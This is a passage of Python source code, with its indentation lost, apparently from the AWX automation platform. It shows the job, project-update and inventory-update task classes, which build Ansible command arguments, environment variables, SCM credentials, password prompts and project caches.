('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: again, figure out more elegant way for inside container
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_cwd(self, job, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that local tree is
# up-to-date with project, job is running project current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_cwd(self, project_update, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: containers
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join('/runner', rel_path) # TODO: make container paths elegant
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join('/runner', 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = injector.filename
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_cwd(self, inventory_update, private_data_dir):
"""
There is one case where the inventory "source" is in a different
location from the private data:
- SCM, where source needs to live in the project folder
"""
src = inventory_update.source
container_dir = '/runner' # TODO: make container paths elegant
if src == 'scm' and inventory_update.source_project_update:
return os.path.join(container_dir, 'project')
return container_dir
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
